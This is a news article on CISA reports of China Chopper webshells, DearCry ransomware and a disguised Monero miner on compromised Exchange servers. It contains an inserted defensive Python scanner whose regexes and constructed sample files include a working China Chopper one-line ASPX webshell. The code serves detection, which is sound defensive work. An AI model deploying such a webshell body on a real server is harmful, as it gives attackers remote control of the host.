China Chopper webshells and the DearCry ransomware were discovered on compromised Microsoft Exchange servers this week, according to two Malware Analysis Reports (MARs) published by the US Cybersecurity and Infrastructure Security Agency (CISA).
The attackers use a set of Exchange Server vulnerabilities that were made public on March 3, the same day Microsoft released patches for them. The flaws had already been exploited in limited, targeted attacks before disclosure, and exploitation spread rapidly once the patches were out.
The first MAR covers the China Chopper webshells found on Exchange servers after they were initially compromised through those vulnerabilities; the webshells give the attackers remote control over the affected server.
CISA's report analyses a total of ten webshell samples, though it notes that this is not an exhaustive list of the webshells threat actors have used in attacks against Exchange servers.
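To make the webshell hunting concrete, here is an added example that is not part of the article or of CISA's report: a small Python scanner that walks an Exchange web root and flags ASP.NET files matching the widely documented China Chopper server-side form, a one-line JScript page that calls eval() on a request parameter with the "unsafe" flag, plus a looser variant without that flag. The pattern set, the extension list and the sample file contents and paths are constructed for the demo and are my assumptions, not CISA's published indicators.

```python
"""Heuristic scan for China Chopper-style ASP.NET webshells (added example).

Not code from the article or from CISA's MAR. Regexes, extension list and
sample files are constructed assumptions for demonstration purposes.
"""
import re
import tempfile
from pathlib import Path
from typing import List, Tuple

# Classic China Chopper ASPX body: eval() of a request parameter with the
# "unsafe" flag, e.g.  <%eval(Request.Item["password"],"unsafe");%>
_CHOPPER_STRICT = re.compile(
    r'eval\s*\(\s*Request(?:\.Item)?\s*\[\s*"[^"]+"\s*\]\s*,\s*"unsafe"\s*\)',
    re.IGNORECASE,
)
# Looser variant: any eval() fed directly from a request parameter.
_CHOPPER_LOOSE = re.compile(r'eval\s*\(\s*Request(?:\.Item)?\s*\[', re.IGNORECASE)


def classify(text: str) -> str:
    """Return 'high', 'medium' or 'none' for one file's contents."""
    if _CHOPPER_STRICT.search(text):
        return "high"
    if _CHOPPER_LOOSE.search(text):
        return "medium"
    return "none"


def scan_tree(root: Path, suffixes=(".aspx", ".ashx", ".asmx")) -> List[Tuple[str, str]]:
    """Walk `root`, classify each ASP.NET file and return (relative path, verdict) hits."""
    hits = []
    for path in sorted(root.rglob("*")):
        if not path.is_file() or path.suffix.lower() not in suffixes:
            continue
        try:
            text = path.read_text(encoding="utf-8", errors="replace")
        except OSError:
            continue  # unreadable file: skip rather than abort the whole scan
        verdict = classify(text)
        if verdict != "none":
            hits.append((path.relative_to(root).as_posix(), verdict))
    return hits


# Constructed sample contents; the paths mimic an Exchange web root layout
# (assumed for the demo, not taken from the CISA report).
SAMPLES = {
    "owa/auth/shell.aspx": '<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>',
    "ecp/auth/variant.aspx": '<%@ Page Language="Jscript"%>\n<% eval(Request["orange"]); %>',
    "owa/auth/logon.aspx": '<%@ Page Language="C#" %>\n<html><body>Sign in</body></html>',
}


def demo() -> List[Tuple[str, str]]:
    """Write the constructed samples into a temp directory and scan them."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        for rel, body in SAMPLES.items():
            dest = root / rel
            dest.parent.mkdir(parents=True, exist_ok=True)
            dest.write_text(body, encoding="utf-8")
        return scan_tree(root)


if __name__ == "__main__":
    for rel, verdict in demo():
        print(f"{verdict:6} {rel}")
```

Point `scan_tree` at the Exchange front-end directories (OWA, ECP and the auth subfolders) on a suspect server. Treat the regexes as a first pass only: several of the shells dropped in this campaign were obfuscated or written in C#, so hits should be confirmed against the file hashes in CISA's MAR, and a clean result from this heuristic is not proof of a clean server.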
CISA is also warning of attacks on Microsoft Exchange servers that try to deploy the DearCry ransomware on already-compromised hosts.
DearCry, also tracked as DoejoCrypt, was the first ransomware family seen exploiting the Exchange vulnerabilities; the Black Kingdom/Pydomer ransomware has also been making similar attempts for over two weeks.
The newly shared MARs include tactics, techniques, and procedures (TTPs) as well as indicators of compromise (IOCs) to help defenders identify and remediate possible compromise.
Attacks on Microsoft Exchange servers are in fact far more varied, and in some cases involve cryptominers: about two weeks ago Microsoft issued an alert about activity by the Lemon Duck cryptomining botnet.
According to Sophos, the targeting of Exchange servers for cryptomining began on March 9, just hours after Microsoft published its Patch Tuesday updates addressing the exploited vulnerabilities. Since then an unknown attacker has been compromising servers to deploy a malicious Monero miner, the security firm says.
What sets this campaign apart is that the malicious payload is hosted on a compromised Exchange server and retrieved with a PowerShell command. The payload is disguised as a legitimate programme called QuickCPU.
The miner was loaded onto a number of compromised servers within days, producing a sharp rise in the attacker's mining hash rate. Since then the miner has lost some of the infected machines and its activity has slowed considerably.